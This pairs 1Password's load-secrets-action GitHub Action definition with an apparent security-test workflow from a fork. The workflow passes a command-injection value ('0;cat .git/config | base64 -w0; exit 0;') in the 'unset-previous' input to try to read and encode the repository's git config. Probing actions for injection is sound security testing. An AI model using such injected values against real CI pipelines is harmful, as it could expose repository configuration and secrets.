1Password/load-secrets-action/action.yml
name: Load secrets from 1Password
description: Make secrets from 1Password Connect available as environment variables in the next steps.
author: 1Password
branding:
  icon: lock
  color: blue
inputs:
  unset-previous:
    description: Whether to unset environment variables populated by 1Password in earlier job steps
    default: false
runs:
  using: composite
  steps:
    - shell: bash
      env:
        INPUT_UNSET_PREVIOUS: ${{ inputs.unset-previous }}
      run: |
        ${{ github.action_path }}/entrypoint.sh

edif2008/load-secrets-action/.github/workflows/test-sec.yml
- name: Load secret
  uses: 1password/load-secrets-action@v1
  with:
    unset-previous: "0;cat .git/config | base64 -w0; exit 0;"
  env:
    OP_CONNECT_HOST: https://op.connect.host/
    OP_CONNECT_TOKEN: "${{ secrets.OP_CONNECT_TOKEN }}"
    SECRET: op://app-cicd/hello-world/secret